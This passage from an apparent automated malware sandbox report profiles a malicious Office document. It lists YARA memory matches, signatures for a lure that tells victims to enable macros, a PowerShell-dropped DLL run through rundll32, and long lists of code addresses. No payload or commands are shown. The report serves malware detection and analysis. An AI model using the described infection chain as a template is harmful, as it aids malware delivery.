                      Source: Yara matchFile source: 0000000A.00000002.2098118909.0000000000320000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2098009043.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2092516972.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2097063566.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2336211532.0000000000260000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2097445507.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2101634327.0000000000720000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2092704885.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2096952501.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2336195679.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2101426694.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2098032897.0000000000280000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2095103110.0000000000870000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2101331684.0000000000370000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2094951149.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2336233664.00000000002D0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 10.2.rundll32.exe.320000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.280000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.260000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.720000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.2f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.3a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.320000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.720000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.870000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.3a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.2f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.260000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.2d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.280000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.870000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.2d0000.1.unpack, type: UNPACKEDPE

                      System Summary:

                      barindex
                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                      Source: Screenshot number: 4Screenshot OCR: Enable Editing and Enable Content. 0 Page: I of I , words: 8,362 , ,3 , N@m 13 ;a 10096 G)
                      Source: Screenshot number: 4Screenshot OCR: Enable Content. 0 Page: I of I , words: 8,362 , ,3 , N@m 13 ;a 10096 G) FI G) ,, ' i " " Kk
                      Source: Document image extraction number: 0Screenshot OCR: Enable Editing and Enable Content.
                      Source: Document image extraction number: 0Screenshot OCR: Enable Content.
                      Source: Document image extraction number: 1Screenshot OCR: Enable Editing and Enable Content.
                      Source: Document image extraction number: 1Screenshot OCR: Enable Content.
                      Powershell drops PE fileShow sources
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dllJump to dropped file
                      Very long command line foundShow sources
                      Source: unknownProcess created: Commandline size = 5413
                      Source: unknownProcess created: Commandline size = 5312
                      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5312
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Fceveflzqtqcb\Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00406417
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0041A0F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00404844
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040E044
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00415250
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00410672
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040BE74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0041AA7B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040327F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00412C05
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00401806
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00402208
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040240F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040E612
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00405418
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040A821
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00410223
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00418C2B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0041D02D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00412631
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00418A33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00414C37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040A6C9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040A2D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0041C6D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040D2DD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0041D4E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040D6F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040ECFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040DE81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00411090
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00414A9E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040CAA3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040C145
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00419B4A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00413F4F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0041434E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0041135B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040C364
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0041B165
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0041A966
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040F369
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00403B74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00407378
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00405B7D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00405F04
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00414F04
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00409106
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0041D70B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040A525
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00409D2F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0041CF31
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00407731
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00403336
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00403938
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00407B39
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0041DBC4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004057D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00402DDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040F5E0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00416BE4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0041CBE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004067EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0041BBF1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004035FC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00407FFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00411DFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00417187
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00411F88
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00410B8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00404D90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00413590
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0041C192
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040BB96
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00412FA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004193AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00403FAF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040ADAF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004147B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004109B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040F9BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040FFBA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00419DBF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00417BBE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00239C3D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00240604
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023C017
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00244012
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00249665
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023E272
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00235478
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024CC7F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00244478
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00239846
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024BC4D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024CA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023C851
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002392A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024C4A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00236CA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002328AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002370AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00232EAC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023B6B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002490BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002434BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00239A99
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002330E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002368EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002350F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002414FC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002400FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002466FB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002438C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002434C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002408CF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023B8D8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024A6D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00249EDA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023E8DD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00233523
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023A323
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023EF2E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023F52E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00243D29
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023FF2C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00247132
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00249333
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024D138
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024B706
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00234304
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023B10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00242515
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024891E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00235D63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024B165
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00232B70
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00241372
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00230D7A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00242179
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023177C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00234D48
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00232353
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023EB54
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00246158
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024C15B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00241BA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00247FA7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024C5A1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002441AB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00233DB8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023D5B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00231983
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023DB86
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023598B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023498C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023F793
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023F797
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00239D95
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024819F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023FBE6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023B3E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002327F3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023D3F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0043303C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00441E14
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0087CAA3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0087D2DD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0088A0F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00876417
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0087A821
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00874844
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00885250
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00880B8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00874D90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_008847B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0088CBE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00875F04
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0087DE81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00884A9E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00881090
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0087A6C9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0088C6D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0087A2D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0088D4E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0087D6F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0087ECFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00871806
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0087240F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00882C05
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00872208
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0087E612
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00875418
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00888C2B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0088D02D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00880223
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00882631
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00888A33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00884C37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0087E044
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0087BE74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0088AA7B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0087327F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00880672
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00881F88
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00887187
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0087BB96
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00883590
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0088C192
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_008893AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00873FAF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0087ADAF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00882FA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_008809B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00887BBE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00889DBF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0087F9BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0087FFBA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0088DBC4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_008757D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00872DDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0087F5E0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_008767EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00886BE4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00881DFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0088BBF1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00877FFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_008735FC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00879106
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0088D70B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00884F04
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0087A525
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00879D2F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00873336
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00877731
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0088CF31
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00877B39
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00873938
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0087C145
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00889B4A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0088434E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00883F4F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0088135B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0087C364
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0088B165
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0088A966
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0087F369
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00873B74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00875B7D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00877378
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00229C3D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00230604
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00234012
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022C017
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00239665
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022E272
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00225478
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00234478
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023CC7F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00229846
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023BC4D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022C851
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023CA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002292A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023C4A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00226CA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002228AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00222EAC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002270AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022B6B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002334BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002390BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00229A99
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002230E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002268EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002250F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002366FB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002300FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002314FC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002334C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002338C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002308CF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00239EDA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022B8D8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023A6D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022E8DD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00223523
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022A323
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00233D29
